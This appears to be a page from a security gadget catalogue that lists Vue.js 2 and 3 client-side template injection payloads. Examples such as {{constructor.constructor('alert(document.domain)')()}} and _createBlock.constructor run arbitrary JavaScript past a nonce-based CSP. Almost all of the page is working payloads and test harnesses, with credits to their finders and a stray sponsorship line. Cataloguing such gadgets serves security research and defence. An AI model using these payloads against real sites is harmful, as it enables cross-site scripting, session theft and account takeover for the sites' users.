Vue.js is an MIT-licensed open source project with its ongoing development made possible entirely by the support of these awesome backers. If you’d like to join them, please consider sponsoring Vue’s development.
This is not the full list of different CSTI payloads. The full list can be found here.
<!-- user input -->
<div id="app">
<p>{{_openBlock.constructor("alert(1)")()}}</p>
<p>{{_createBlock.constructor("alert(2)")()}}</p>
<p>{{_toDisplayString.constructor("alert(3)")()}}</p>
<p>{{_createVNode.constructor("alert(4)")()}}</p>
<p v-show=_createBlock.constructor`alert(5)`()></p>
<x></x>
<teleport></teleport>
</div>
<script nonce="secret" src="https://unpkg.com/vue@3/dist/vue.global.js"></script>
<script nonce="secret">
const app = Vue.createApp({
data() { return { input: "# hello" }}
})
app.mount("#app");
</script>Related links:
Found by @garethheyes, @LewisArdern, @PwnFunction.
This is not the full list of different CSTI payloads. The full list can be found here.
The author of this gadget is cure53berlin, but since many other gadgets were found by other hackers, I’ve listed all of them as authors for this gadget.
<!-- user input -->
<div id="app">
<p>{{constructor.constructor("alert(document.domain)")()}}</p>
</div>
<script nonce="secret" src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
<script nonce="secret">
new Vue({
el: "#app",
data: {}
});
</script>Related links:
Found by @cure53berlin, @garethheyes, @slekies, @LewisArdern, @PwnFunction, @sirdarckcat, @kkotowicz, @davwwwx, @p4fg.